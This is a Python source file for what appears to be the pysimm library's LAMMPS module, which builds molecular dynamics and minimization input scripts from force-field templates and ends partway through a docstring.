# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import shlex
import shutil
from subprocess import call, Popen, PIPE
from queue import Queue, Empty
from threading import Thread
import os
import sys
import json
from random import randint
from time import strftime
from io import StringIO
try:
import pandas as pd
except ImportError:
pd = None
from pysimm.system import read_lammps
from pysimm.system import System
from pysimm import error_print
from pysimm import warning_print
from pysimm import verbose_print
from pysimm import debug_print
from pysimm.utils import PysimmError, Item, ItemContainer
try:
from Rappture.tools import getCommandOutput as RapptureExec
except ImportError:
pass
# Path to the LAMMPS executable; must be supplied via the environment.
LAMMPS_EXEC = os.environ.get('LAMMPS_EXEC')
# Module-wide verbosity toggle for subprocess output.
verbose = False
# Registry for named input templates (empty here; presumably filled elsewhere -- TODO confirm).
templates = {}

# Per-force-field LAMMPS style settings: interaction styles, mixing rules and
# special_bonds exclusions used to initialize a simulation for each supported
# force field.
FF_SETTINGS = {
    'dreiding':
        {
            'pair_style': 'lj/cut',
            'bond_style': 'harmonic',
            'angle_style': 'harmonic',
            'dihedral_style': 'harmonic',
            'improper_style': 'umbrella',
            'pair_modify': {
                'mix': 'arithmetic'
            },
            'special_bonds': 'dreiding'
        },
    'amber':
        {
            'pair_style': 'lj/cut',
            'bond_style': 'harmonic',
            'angle_style': 'harmonic',
            'dihedral_style': 'fourier',
            'improper_style': 'cvff',
            'pair_modify': {
                'mix': 'arithmetic'
            },
            'special_bonds': 'amber'
        },
    'tip3p':
        {
            'pair_style': 'lj/cut',
            'bond_style': 'harmonic',
            'angle_style': 'harmonic',
            'dihedral_style': 'fourier',
            'improper_style': 'cvff',
            'pair_modify': {
                'mix': 'arithmetic'
            },
            'special_bonds': 'amber'
        },
    'pcff':
        {
            'pair_style': 'lj/class2',
            'bond_style': 'class2',
            'angle_style': 'class2',
            'dihedral_style': 'class2',
            'improper_style': 'class2',
            'pair_modify': {
                'mix': 'sixthpower'
            },
            'special_bonds': 'lj/coul 0 0 1'
        },
    'opls':
        {
            'pair_style': 'lj/cut',
            'bond_style': 'harmonic',
            'angle_style': 'harmonic',
            'dihedral_style': 'opls',
            'improper_style': 'cvff',
            'pair_modify': {
                'mix': 'geometric'
            },
            'special_bonds': 'lj/coul 0 0 0.5'
        },
    'charmm':
        {
            'pair_style': 'lj/charmm',
            'bond_style': 'harmonic',
            'angle_style': 'charmm',
            'dihedral_style': 'charmm',
            'improper_style': 'harmonic',
            'pair_modify': {
                'mix': 'arithmetic'
            },
            'special_bonds': 'charmm'
        },
    'trappe/amber':
        {
            'pair_style': 'lj/cut',
            'bond_style': 'harmonic',
            'angle_style': 'harmonic',
            'dihedral_style': 'fourier',
            'improper_style': 'cvff',
            'pair_modify': {
                'mix': 'arithmetic'
            },
            'special_bonds': 'amber'
        }
}
def check_lmps_exec():
    """Verify that the LAMMPS executable is configured and launchable.

    Returns:
        True when LAMMPS_EXEC points at a runnable binary, False otherwise.
    """
    if LAMMPS_EXEC is None:
        print('you must set environment variable LAMMPS_EXEC')
        return False
    try:
        # Launch with echo/log disabled just to confirm the binary starts.
        Popen([LAMMPS_EXEC, '-e', 'both', '-l', 'none'],
              stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
        if verbose:
            print('using %s LAMMPS machine' % LAMMPS_EXEC)
        return True
    except OSError:
        print('LAMMPS is not configured properly for one reason or another')
        return False
class Init(object):
    """pysimm.lmps.Init

    Template object to contain LAMMPS initialization settings.

    Attributes:
        forcefield: name of a supported force field; simulation settings will be chosen based on the force field name
        units: LAMMPS set of units to use during simulation; default=real
        atom_style: LAMMPS atom_style to use during simulation; default=full
        charge: option to define if any particles in system have a non-zero charge
        kspace_style: LAMMPS kspace_style to use during simulation if system has charges; default=pppm 1e-4
        cutoff: dictionary of cutoff distances for nonbonded interactions; default={'lj': 12.0, 'coul': 12.0, 'inner_lj': 10.0}
        pair_style: LAMMPS pair_style to use during simulation
        bond_style: LAMMPS bond_style to use during simulation
        angle_style: LAMMPS angle_style to use during simulation
        dihedral_style: LAMMPS dihedral_style to use during simulation
        improper_style: LAMMPS improper_style to use during simulation
        special_bonds: LAMMPS special_bonds to use during simulation
        pair_modify: LAMMPS pair_modify to use during simulation
        read_data: name of data file to read instead of using :class:`~pysimm.system.System` object
    """
    def __init__(self, **kwargs):
        self.forcefield = kwargs.get('forcefield')
        self.units = kwargs.get('units', 'real')
        self.atom_style = kwargs.get('atom_style', 'full')
        self.charge = kwargs.get('charge')
        self.kspace_style = kwargs.get('kspace_style', 'pppm 1e-4')
        self.cutoff = kwargs.get('cutoff')
        self.pair_style = kwargs.get('pair_style')
        self.bond_style = kwargs.get('bond_style')
        self.angle_style = kwargs.get('angle_style')
        self.dihedral_style = kwargs.get('dihedral_style')
        self.improper_style = kwargs.get('improper_style')
        self.special_bonds = kwargs.get('special_bonds')
        self.pair_modify = kwargs.get('pair_modify', {})
        self.create_box = kwargs.get('create_box')
        self.read_data = kwargs.get('read_data')

        # Map force field aliases onto the canonical names used in FF_SETTINGS.
        if self.forcefield and self.forcefield not in ['amber', 'trappe/amber', 'dreiding', 'pcff', 'opls', 'charmm']:
            if self.forcefield.lower() in ['gaff', 'gaff2']:
                self.forcefield = 'amber'
            elif self.forcefield.lower() in ['cgenff']:
                self.forcefield = 'charmm'

        # A scalar cutoff applies to both lj and coul; inner_lj is 2.0 less.
        if isinstance(self.cutoff, int) or isinstance(self.cutoff, float):
            self.cutoff = {'lj': self.cutoff, 'coul': self.cutoff, 'inner_lj': self.cutoff-2.0}
        if self.cutoff is None:
            self.cutoff = {'lj': 12.0, 'coul': 12.0, 'inner_lj': 10.0}

    def write(self, sim=None):
        """pysimm.lmps.Init.write

        Prepare LAMMPS input with initialization settings.

        Args:
            sim: :class:`~pysimm.lmps.Simulation` object reference

        Returns:
            string of LAMMPS input
        """
        if sim:
            s = sim.system
        else:
            s = None

        # Infer the force field from the system or simulation when not given.
        if self.forcefield is None and s and s.forcefield is not None:
            if s.forcefield in ['gaff', 'gaff2']:
                self.forcefield = 'amber'
            elif s.forcefield in ['cgenff']:
                self.forcefield = 'charmm'
            else:
                self.forcefield = s.forcefield
        elif self.forcefield is None and sim and sim.forcefield is not None:
            self.forcefield = sim.forcefield

        if self.special_bonds is None and self.forcefield is not None:
            self.special_bonds = FF_SETTINGS[self.forcefield]['special_bonds']

        if self.forcefield is not None:
            # Force-field defaults first, then user overrides on top.
            pair_modify = FF_SETTINGS[self.forcefield]['pair_modify']
            if self.pair_modify:
                pair_modify.update(self.pair_modify)
            self.pair_modify = pair_modify

        # Enable charge handling if any particle carries a non-zero charge.
        if self.charge is None and s is not None:
            for p in s.particles:
                if p.charge:
                    self.charge = True
                    break
        if self.charge is None:
            self.charge = False

        lammps_input = ''
        lammps_input += '\n' + '#'*80 + '\n'
        lammps_input += '#'*34 + ' Init ' + '#'*34 + '\n'
        lammps_input += '#'*80 + '\n'

        lammps_input += '{:<15} {}\n'.format('units', self.units)
        lammps_input += '{:<15} {}\n'.format('atom_style', self.atom_style)

        if self.create_box and self.create_box.region and type(self.create_box.region) is Region:
            lammps_input += self.create_box.region.write(None)
            lammps_input += self.create_box.write(None)

        if self.pair_style:
            lammps_input += '{:<15} {}'.format('pair_style', self.pair_style)
        elif self.forcefield:
            self.pair_style = FF_SETTINGS[self.forcefield]['pair_style']
            lammps_input += '{:<15} {}'.format('pair_style', self.pair_style)
            if self.charge:
                # Charged systems need long-range coulomb handling.
                lammps_input += '/coul/long'
                self.pair_style += '/coul/long'
        else:
            raise PysimmError('A pair_style must be defined during initialization')

        if self.cutoff:
            # BUGFIX: was `self.forcefield == ['charmm']`, comparing a string to
            # a list, which is always False, so the charmm inner lj cutoff was
            # never written.
            if self.forcefield == 'charmm' and self.cutoff.get('inner_lj'):
                lammps_input += ' {} '.format(self.cutoff['inner_lj'])
            lammps_input += ' {} '.format(self.cutoff['lj'])
            if self.charge and self.cutoff.get('coul'):
                lammps_input += ' {} '.format(self.cutoff['coul'])
        lammps_input += '\n'

        if self.charge:
            lammps_input += '{:<15} {}\n'.format('kspace_style', self.kspace_style)

        # Bonded styles: fall back to force-field defaults only when the system
        # actually contains interactions of that type.
        if self.bond_style is None and s and s.bonds.count > 0:
            if self.forcefield:
                self.bond_style = FF_SETTINGS[self.forcefield]['bond_style']
        if self.bond_style:
            lammps_input += '{:<15} {}\n'.format('bond_style', self.bond_style)

        if self.angle_style is None and s and s.angles.count > 0:
            if self.forcefield:
                self.angle_style = FF_SETTINGS[self.forcefield]['angle_style']
        if self.angle_style:
            lammps_input += '{:<15} {}\n'.format('angle_style', self.angle_style)

        if self.dihedral_style is None and s and s.dihedrals.count > 0:
            if self.forcefield:
                self.dihedral_style = FF_SETTINGS[self.forcefield]['dihedral_style']
        if self.dihedral_style:
            lammps_input += '{:<15} {}\n'.format('dihedral_style', self.dihedral_style)

        if self.improper_style is None and s and s.impropers.count > 0:
            if self.forcefield:
                self.improper_style = FF_SETTINGS[self.forcefield]['improper_style']
        if self.improper_style:
            lammps_input += '{:<15} {}\n'.format('improper_style', self.improper_style)

        if self.special_bonds:
            lammps_input += '{:<15} {}\n'.format('special_bonds', self.special_bonds)

        if self.pair_modify:
            lammps_input += '{:<15} '.format('pair_modify')
            for k, v in self.pair_modify.items():
                lammps_input += '{} {} '.format(k, v)
            lammps_input += '\n'

        if self.read_data:
            lammps_input += '{:<15} {}\n'.format('read_data', self.read_data)
        elif s:
            # No explicit data file: serialize the system to a temp file.
            s.write_lammps('temp.lmps')
            lammps_input += '{:<15} temp.lmps\n'.format('read_data')

        if self.pair_style and self.pair_style.startswith('buck'):
            # Buckingham cross terms: geometric mean for a and c, arithmetic for rho.
            for pt1 in s.particle_types:
                for pt2 in s.particle_types:
                    if pt1.tag <= pt2.tag:
                        a = pow(pt1.a*pt2.a, 0.5)
                        c = pow(pt1.c*pt2.c, 0.5)
                        rho = 0.5*(pt1.rho+pt2.rho)
                        lammps_input += '{:<15} {} {} {} {} {}\n'.format('pair_coeff', pt1.tag, pt2.tag, a, rho, c)

        lammps_input += '#'*80 + '\n\n'
        return lammps_input
class Region(Item):
    """pysimm.lmps.Region

    Template object representing a LAMMPS region command. See the LAMMPS
    documentation for style-specific arguments.

    Attributes:
        name: name id for region
        style: LAMMPS region style
        *args: args for given style
        **kwargs: optional kwargs for region command
    """
    def __init__(self, name='all', style='block', *args, **kwargs):
        Item.__init__(self, name=name, style=style, args=args, kwargs=kwargs)

    def write(self, sim=None):
        """Return the LAMMPS 'region' command string for these settings."""
        parts = ['{:<15} {} {} '.format('region', self.name, self.style)]
        if self.args:
            parts.extend('{} '.format(a) for a in self.args)
        else:
            # No explicit bounds: span the whole box in all six directions.
            parts.extend('EDGE ' for _ in range(6))
        parts.extend('{} {} '.format(k, v) for k, v in self.kwargs.items())
        parts.append('\n')
        return ''.join(parts)
class CreateBox(Item):
    """pysimm.lmps.CreateBox

    Template object to create a box in a LAMMPS simulation. See LAMMPS documentation for further information.

    Attributes:
        n: number of atom types
        region: :class:`~pysimm.lmps.Region` object; a fresh default Region is
            created per instance (fix: the original used `region=Region()` as a
            default argument, sharing one mutable instance across all objects)
        **kwargs: optional kwargs for create_box command (replace / with _)
    """
    def __init__(self, n=1, region=None, *args, **kwargs):
        if region is None:
            region = Region()
        Item.__init__(self, n=n, region=region, args=args, kwargs=kwargs)

    def write(self, sim=None):
        """Return the LAMMPS 'create_box' command string for these settings."""
        inp = '{:<15} {n} {region.name} '.format('create_box', **vars(self))
        for k, v in self.kwargs.items():
            # Underscores in python kwargs map to '/' in LAMMPS keywords.
            inp += '{} {} '.format(k.replace('_', '/'), v)
        inp += '\n'
        return inp
class Group(Item):
    """pysimm.lmps.Group

    Template object to define a group in a LAMMPS simulation. See LAMMPS
    documentation for available styles.

    Attributes:
        name: name for the group
        style: style for the group
        *args: arguments for the given style
    """
    def __init__(self, name='all', style='id', *args, **kwargs):
        Item.__init__(self, name=name, style=style, args=args, **kwargs)

    def write(self, sim=None):
        """Return the LAMMPS 'group' command string for these settings."""
        tokens = ['{:<15} {} {} '.format('group', self.name, self.style)]
        if self.args:
            tokens.extend('{} '.format(a) for a in self.args)
        else:
            tokens.append('*')  # no explicit ids: match everything
        tokens.append('\n')
        return ''.join(tokens)
class Velocity(Item):
    """pysimm.lmps.Velocity
    Template object to define velocity initialization in a LAMMPS simulation. See LAMMPS documentation for further information
    Attributes:
        group: group for velocity command
        style: style for the velocity command
        *args: arguments for the given style
    """
    def __init__(self, group=Group('all'), style='create', *args, **kwargs):
        # NOTE(review): attributes such as seed/temperature/from_args/dist/...
        # are not assigned directly here; they appear to be provided by Item's
        # kwargs handling (missing attributes presumably read as None) --
        # confirm against pysimm.utils.Item.
        Item.__init__(self, group=group, style=style, args=args, **kwargs)
        if self.seed is None:
            # Random seed used by the 'create' style when none was supplied.
            self.seed = randint(10000, 99999)
        if self.temperature is None:
            self.temperature = 300.0
        if args:
            # Raw positional args short-circuit the structured formatting in write().
            self.from_args = True
    def write(self, sim=None):
        """Return the LAMMPS 'velocity' command string for these settings."""
        if isinstance(self.group, Group):
            inp = '{:<15} {group.name} {style} '.format('velocity', group=self.group, style=self.style)
        else:
            inp = '{:<15} {group} {style} '.format('velocity', group=self.group, style=self.style)
        if self.from_args:
            # Caller supplied explicit arguments; emit them verbatim.
            for a in self.args:
                inp += '{} '.format(a)
        elif self.style == 'create' or self.style == 'scale':
            inp += '{temp} '.format(temp=self.temperature)
            if self.style == 'create':
                inp += '{seed} '.format(seed=self.seed)
        # Optional keyword settings recognized by the velocity command.
        for k in ['dist', 'sum', 'mom', 'rot', 'bias', 'loop', 'rigid', 'units']:
            if getattr(self, k):
                inp += '{} {} '.format(k, getattr(self, k))
        inp += '\n'
        return inp
class OutputSettings(object):
    """pysimm.lmps.OutputSettings
    Template object to define thermo and dump output settings in a LAMMPS simulation. See LAMMPS documentation for further information
    Attributes:
        thermo: dictionary of settings for thermo output
        dump: dictionary of settings for dump output
    """
    def __init__(self, **kwargs):
        self.thermo = kwargs.get('thermo')
        self.dump = kwargs.get('dump', kwargs.get('trajectory'))
        # A bare int is shorthand for the output frequency; expand it and
        # fill in defaults for the remaining settings.
        if isinstance(self.thermo, int):
            self.thermo = {'freq': self.thermo}
        if isinstance(self.thermo, dict):
            self.thermo['freq'] = self.thermo.get('freq', 1000)
            self.thermo['style'] = self.thermo.get('style', 'custom')
            self.thermo['args'] = self.thermo.get('args', ['step', 'time', 'temp', 'vol', 'press', 'etotal', 'epair', 'emol', 'density'])
            self.thermo['modify'] = self.thermo.get('modify')
        if isinstance(self.dump, int):
            self.dump = {'freq': self.dump}
        if isinstance(self.dump, dict):
            self.dump['freq'] = self.dump.get('freq', 1000)
            self.dump['group'] = self.dump.get('group', Group(name='all'))
            self.dump['name'] = self.dump.get('name', 'pysimm_dump')
            self.dump['style'] = self.dump.get('style', 'custom')
            self.dump['filename'] = self.dump.get('filename', 'dump.*')
            self.dump['args'] = self.dump.get('args', ['id', 'type', 'mol', 'x', 'y', 'z', 'vx', 'vy', 'vz'])
            self.dump['modify'] = self.dump.get('modify')
        # Allow the dump group to be given by name instead of a Group object.
        if isinstance(self.dump, dict) and isinstance(self.dump['group'], str):
            self.dump['group'] = Group(name=self.dump['group'])
    def write(self, sim=None):
        """Return LAMMPS input lines for the configured thermo and dump output."""
        lammps_input = ''
        if isinstance(self.thermo, dict):
            lammps_input += '\n' + '#'*80 + '\n'
            lammps_input += '#'*29 + ' Thermo output ' + '#'*29 + '\n'
            lammps_input += '#'*80 + '\n'
            lammps_input += '{:<15} {}\n'.format('thermo', self.thermo['freq'])
            lammps_input += '{:<15} {} '.format('thermo_style', self.thermo['style'])
            if self.thermo['style'] == 'custom':
                # 'custom' style takes an explicit column list.
                lammps_input += ' '.join(self.thermo['args'])
            lammps_input += '\n'
            if self.thermo.get('modify'):
                lammps_input += '{:<15} {} '.format('thermo_modify', self.thermo.get('modify'))
                lammps_input += '\n'
            lammps_input += '#'*80 + '\n\n'
        if isinstance(self.dump, dict):
            lammps_input += '\n' + '#'*80 + '\n'
            lammps_input += '#'*30 + ' Dump output ' + '#'*30 + '\n'
            lammps_input += '#'*80 + '\n'
            lammps_input += '{:<15} {} {} {} {} {} '.format('dump', self.dump['name'], self.dump['group'].name, self.dump['style'], self.dump['freq'], self.dump['filename'])
            if self.dump['style'] == 'custom':
                lammps_input += ' '.join(self.dump['args'])
            lammps_input += '\n'
            if self.dump.get('modify'):
                lammps_input += '{:<15} {} {} '.format('dump_modify', self.dump['name'], self.dump.get('modify'))
                lammps_input += '\n'
            lammps_input += '#'*80 + '\n\n'
        return lammps_input
class Qeq(object):
    """pysimm.lmps.Qeq
    Template object to contain LAMMPS qeq (charge equilibration) settings
    Attributes:
        cutoff: distance cutoff for charge equilibration
        tol: tolerance (precision) for charge equilibration
        max_iter: maximum iterations
        qfile: file with qeq parameters (leave undefined for defaults)
    """
    def __init__(self, **kwargs):
        self.cutoff = kwargs.get('cutoff', 10)
        self.tol = kwargs.get('tol', 1.0e-6)
        self.max_iter = kwargs.get('max_iter', 200)
        self.qfile = kwargs.get('qfile')
        self.input = ''
    def write(self, sim=None):
        """pysimm.lmps.Qeq.write
        Create LAMMPS input for a charge equilibration calculation
        Args:
            sim: :class:`~pysimm.lmps.Simulation` object reference
        Returns:
            input string
        """
        if self.qfile is None:
            # No parameter file given: build one from the bundled hcno.json
            # defaults for each particle type in the simulated system.
            param_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                      os.pardir, 'dat', 'qeq', 'hcno.json')
            with open(param_file) as f:
                qeq_params = json.loads(f.read())
            with open('pysimm.qeq.tmp', 'w') as f:
                for pt in sim.system.particle_types:
                    f.write('{}\t{}\t{}\t{}\t{}\t{}\n'.format(pt.tag,
                                                              qeq_params[pt.elem]['chi'],
                                                              qeq_params[pt.elem]['eta']*2,
                                                              qeq_params[pt.elem]['gamma'],
                                                              qeq_params[pt.elem]['zeta'],
                                                              qeq_params[pt.elem]['qcore']))
            self.qfile = 'pysimm.qeq.tmp'
        self.input = ''
        # Apply fix qeq/point, evaluate once with run 0, then remove the fix.
        self.input += 'fix 1 all qeq/point 1 {} {} {} {}\n'.format(self.cutoff, self.tol, self.max_iter, self.qfile)
        self.input += 'run 0\n'
        self.input += 'unfix 1\n'
        return self.input
class MolecularDynamics(object):
    """pysimm.lmps.MolecularDynamics
    Template object to contain LAMMPS MD settings
    Attributes:
        name: name to identify MD
        group: :class:`~pysimm.lmps.Group` object for integrator
        timestep: timestep value to use during MD
        ensemble: 'nvt' or 'npt' or 'nve'; default=nve
        limit: numerical value to use with nve when limiting particle displacement
        temperature: dictionary of settings for temperature (start, stop, damp)
        pressure: dictionary of settings for pressure (start, stop, damp)
        run: length of MD simulation in number of timesteps or False to omit run command
        unfix: True to include command to unfix integrator after run
        rigid: dictionary of settings for a rigid simulation
        extra_keywords: dictionary of extra keywords to append at the end of the LAMMPS fix integrator
    """
    def __init__(self, **kwargs):
        self.name = kwargs.get('name', 'pysimm_md')
        self.group = kwargs.get('group', Group(name='all'))
        self.timestep = kwargs.get('timestep', 1)
        self.ensemble = kwargs.get('ensemble', 'nve')
        self.limit = kwargs.get('limit')
        self.temperature = kwargs.get('temperature', kwargs.get('temp', 300.))
        self.pressure = kwargs.get('pressure', 1.)
        self.run = kwargs.get('run', kwargs.get('length', 2000))
        self.unfix = kwargs.get('unfix', True)
        self.rigid = kwargs.get('rigid')
        self.extra_keywords = kwargs.get('extra_keywords', {})
        if kwargs.get('temp') is not None:
            print('temp keyword argument is deprecated for MolecularDynamics, please use temperature instead')
        # Normalize convenience inputs into their structured forms.
        if isinstance(self.group, str):
            self.group = Group(name=self.group)
        if isinstance(self.temperature, int) or isinstance(self.temperature, float):
            self.temperature = {'start': self.temperature}
        if isinstance(self.pressure, int) or isinstance(self.pressure, float):
            self.pressure = {'start': self.pressure}
        if isinstance(self.rigid, dict):
            # Rigid-body integration wraps the base ensemble, e.g. 'rigid/nvt'.
            self.ensemble = 'rigid/{}'.format(self.ensemble)
            if self.rigid.get('small'):
                self.ensemble += '/small '
        self.input = ''
    def write(self, sim=None):
        """pysimm.lmps.MolecularDynamics.write
        Create LAMMPS input for a molecular dynamics simulation.
        Args:
            sim: pysimm.lmps.Simulation object reference
        Returns:
            input string
        """
        self.input = ''
        self.input += '{:<15} {}\n'.format('timestep', self.timestep)
        self.input += '{:<15} {} {} {}'.format('fix', self.name, self.group.name, self.ensemble)
        if self.ensemble == 'nve' and self.limit:
            # nve/limit caps per-step particle displacement.
            self.input += '/limit {} '.format(self.limit)
        else:
            self.input += ' '
        if self.rigid:
            self.input += '{} '.format(self.rigid.get('style', 'molecule'))
            if self.rigid.get('style') == 'group':
                # 'group' style expects a count followed by the group names.
                assert isinstance(self.rigid.get('groups'), list)
                self.input += ' {} '.format(len(self.rigid.get('groups')))
                for g in self.rigid.get('groups'):
                    if isinstance(g, Group):
                        group_name = g.name
                    else:
                        group_name = g
                    self.input += '{} '.format(group_name)
        if 't' in self.ensemble:
            # Thermostat keywords: start/stop temperature and damping constant.
            self.input += 'temp {} {} {} '.format(self.temperature.get('start', 300.), self.temperature.get('stop', self.temperature.get('start', 300.)), self.temperature.get('damp', 100*self.timestep))
        if 'p' in self.ensemble:
            # Barostat keywords: coupling style, start/stop pressure, damping.
            self.input += '{} {} {} {} '.format(self.pressure.get('iso', 'aniso'), self.pressure.get('start', 1.), self.pressure.get('stop', self.pressure.get('start', 1.)), self.pressure.get('damp', 1000*self.timestep))
        for k, v in self.extra_keywords.items():
            self.input += '{} {} '.format(k, v)
        self.input += '\n'
        if self.run is not False:
            self.input += '{:<15} {}\n'.format('run', int(self.run))
        if self.run and self.unfix:
            self.input += 'unfix {}\n'.format(self.name)
        return self.input
class SteeredMolecularDynamics(MolecularDynamics):
    """Template for a steered MD (SMD) run pulling particle p1 toward p2.

    Attributes:
        p1: particle whose tag defines the steered group
        p2: particle whose tag defines the coupling partner group
        k: spring constant for the SMD spring
        v: pulling velocity
        d: target distance
    """
    def __init__(self, **kwargs):
        MolecularDynamics.__init__(self, **kwargs)
        self.p1 = kwargs.get('p1')
        self.p2 = kwargs.get('p2')
        self.k = kwargs.get('k', 20.0)
        self.v = kwargs.get('v', 0.001)
        self.d = kwargs.get('d', 3.0)
    def write(self, sim=None):
        """pysimm.lmps.SteeredMolecularDynamics.write
        Create LAMMPS input for a steered molecular dynamics simulation.
        Args:
            sim: :class:`~pysimm.lmps.Simulation` object reference
        Returns:
            input string

        NOTE(review): this method reads attributes (thermo, thermo_style,
        t_start, t_stop, tdamp, p_start, p_stop, pdamp, new_v, scale_v, seed,
        dump, dump_name, dump_append, length) that MolecularDynamics.__init__
        as shown in this file never sets -- it looks like legacy code written
        against an older parent class, and calling it as-is would raise
        AttributeError. Verify before use.
        """
        self.input = ''
        if self.thermo:
            self.input += 'thermo %s\n' % int(self.thermo)
        if self.thermo_style:
            self.input += 'thermo_style %s\n' % self.thermo_style
        self.input += 'timestep %s\n' % self.timestep
        if self.ensemble == 'nvt':
            self.input += 'fix 1 all %s temp %s %s %s\n' % (self.ensemble, self.t_start, self.t_stop, self.tdamp)
        elif self.ensemble == 'npt':
            self.input += ('fix 1 all %s temp %s %s %s iso %s %s %s\n'
                           % (self.ensemble, self.t_start, self.t_stop, self.tdamp, self.p_start, self.p_stop, self.pdamp))
        elif self.ensemble == 'nve':
            self.input += 'fix 1 all %s\n' % self.ensemble
        if self.new_v:
            self.input += 'velocity all create %s %s\n' % (self.t_start, self.seed)
        elif self.scale_v:
            self.input += 'velocity all scale %s\n' % self.t_start
        if self.dump:
            # Choose a trajectory file name: explicit, simulation-derived, or default.
            if self.dump_name:
                self.input += ('dump pysimm_dump all atom %s %s.lammpstrj\n'
                               % (self.dump, self.dump_name))
            elif sim.name:
                self.input += ('dump pysimm_dump all atom %s %s.lammpstrj\n'
                               % (self.dump, '_'.join(sim.name.split())))
            else:
                self.input += ('dump pysimm_dump all atom %s pysimm_dump.lammpstrj\n'
                               % self.dump)
            if self.dump_append:
                self.input += 'dump_modify pysimm_dump append yes\n'
        # SMD setup: two single-particle groups coupled by a moving spring.
        self.input += 'group p1 id {}\n'.format(self.p1.tag)
        self.input += 'group p2 id {}\n'.format(self.p2.tag)
        self.input += 'fix steer p1 smd cvel {} {} couple p2 auto auto auto {}\n'.format(self.k, self.v, self.d)
        self.input += 'run %s\n' % int(self.length)
        self.input += 'unfix 1\n'
        self.input += 'unfix steer\n'
        if self.dump:
            self.input += 'undump pysimm_dump\n'
        return self.input
class Minimization(object):
    """pysimm.lmps.Minimization

    Template object to contain LAMMPS energy minimization settings.

    Attributes:
        min_style: LAMMPS minimization style; default='fire'
        dmax: maximum distance an atom may move in one line search, in any dimension
        etol: energy tolerance; default=1e-3
        ftol: force tolerance; default=1e-3
        maxiter: maximum iterations; default=10000
        maxeval: maximum force evaluations; default=100000
    """
    def __init__(self, **kwargs):
        self.min_style = kwargs.get('min_style', 'fire')
        self.dmax = kwargs.get('dmax')
        self.etol = kwargs.get('etol', 1.0e-3)
        self.ftol = kwargs.get('ftol', 1.0e-3)
        self.maxiter = kwargs.get('maxiter', 10000)
        self.maxeval = kwargs.get('maxeval', 100000)
        self.input = ''

    def write(self, sim=None):
        """pysimm.lmps.Minimization.write

        Create LAMMPS input for an energy minimization simulation.

        Args:
            sim: :class:`~pysimm.lmps.Simulation` object reference

        Returns:
            input string
        """
        lines = ['min_style %s\n' % self.min_style]
        if self.dmax:
            lines.append('min_modify dmax %s\n' % self.dmax)
        lines.append('minimize %s %s %s %s\n' % (self.etol, self.ftol,
                                                 self.maxiter, self.maxeval))
        self.input = ''.join(lines)
        return self.input
class CustomInput(object):
    """pysimm.lmps.CustomInput
    Template object to contain custom LAMMPS input.
    Attributes:
        custom_input: custom input string
    """
    def __init__(self, custom_input):
        # normalize to a newline-terminated command string
        self.input = str(custom_input) + '\n'
    def write(self, sim=None):
        """pysimm.lmps.CustomInput.write
        Create LAMMPS input for a custom simulation.
        Args:
            sim: :class:`~pysimm.lmps.Simulation` object reference (unused)
        Returns:
            input string
        """
        return self.input
class Simulation(object):
    """pysimm.lmps.Simulation
    Organizational object for LAMMPS simulation. Should contain combination of
    :class:`~pysimm.lmps.MolecularDynamics`, :class:`~pysimm.lmps.Minimization`, and/or :class:`~pysimm.lmps.CustomInput` object.
    Attributes:
        forcefield: name of force field for simulation settings
        name: name for simulation
        log: LAMMPS log filename
        write: file name to write final LAMMPS data file default=None
        print_to_screen: True to have LAMMPS output printed to stdout after simulation ends
        debug: True to have LAMMPS output streamed to stdout during simulation (WARNING: this may degrade performance)
        custom: option to flag simulation as purely custom input to skip preparing initialization
    """
    def __init__(self, s, **kwargs):
        # system the simulation operates on
        self.system = s
        self.forcefield = kwargs.get('forcefield')
        # fall back to the force field already attached to the system
        if self.forcefield is None and s and s.forcefield is not None:
            self.forcefield = s.forcefield
        self.debug = kwargs.get('debug', False)
        self.print_to_screen = kwargs.get('print_to_screen', False)
        # NOTE(review): default is False rather than None — downstream code only
        # tests truthiness, so either works; confirm before changing
        self.name = kwargs.get('name', False)
        self.log = kwargs.get('log')
        self.write = kwargs.get('write', False)
        self.custom = kwargs.get('custom')
        # accumulated LAMMPS input text; rebuilt by write_input()
        self._input = ''
        # ordered list of input templates (Init/Qeq/MolecularDynamics/Minimization/CustomInput)
        self.sim = kwargs.get('sim', [])
    def add(self, *args):
        """pysimm.lmps.Simulation.add
        Append templates (or raw input strings) to the simulation task list.
        Plain strings are wrapped in :class:`~pysimm.lmps.CustomInput`; all
        other objects are appended as-is and are expected to provide a
        ``write(sim)`` method.
        Returns:
            the last item processed
        """
        for item in args:
            if isinstance(item, str):
                self.sim.append(CustomInput(item))
            else:
                self.sim.append(item)
        return item
    def add_qeq(self, template=None, **kwargs):
        """pysimm.lmps.Simulation.add_qeq
        Add :class:`~pysimm.lmps.Qeq` template to simulation
        Args:
            template: :class:`~pysimm.lmps.Qeq` object reference
            **kwargs: if template is None these are passed to :class:`~pysimm.lmps.Qeq` constructor to create new template
        """
        if template is None:
            self.sim.append(Qeq(**kwargs))
        elif isinstance(template, Qeq):
            self.sim.append(template)
        else:
            error_print('you must add an object of type Qeq to Simulation')
    def add_md(self, template=None, **kwargs):
        """pysimm.lmps.Simulation.add_md
        Add :class:`~pysimm.lmps.MolecularDynamics` template to simulation
        Args:
            template: :class:`~pysimm.lmps.MolecularDynamics` object reference
            **kwargs: if template is None these are passed to :class:`~pysimm.lmps.MolecularDynamics` constructor to create new template
        """
        if template is None:
            self.sim.append(MolecularDynamics(**kwargs))
        elif isinstance(template, MolecularDynamics):
            self.sim.append(template)
        else:
            error_print('you must add an object of type MolecularDynamics to Simulation')
    def add_min(self, template=None, **kwargs):
        """pysimm.lmps.Simulation.add_min
        Add :class:`~pysimm.lmps.Minimization` template to simulation
        Args:
            template: :class:`~pysimm.lmps.Minimization` object reference
            **kwargs: if template is None these are passed to :class:`~pysimm.lmps.Minimization` constructor to create new template
        """
        if template is None:
            self.sim.append(Minimization(**kwargs))
        elif isinstance(template, Minimization):
            self.sim.append(template)
        else:
            error_print('you must add an object of type Minimization to Simulation')
    def add_custom(self, custom=''):
        """pysimm.lmps.Simulation.add_custom
        Add custom input string to simulation
        Args:
            custom: custom LAMMPS input string to add to Simulation
        """
        self.sim.append(CustomInput(custom))
    @property
    def input(self):
        # regenerating on every access keeps the text in sync with self.sim
        self.write_input()
        return self._input
    def write_input(self, init=True):
        """pysimm.lmps.Simulation.write_input
        Creates LAMMPS input string including initialization and input from templates/custom input
        Args:
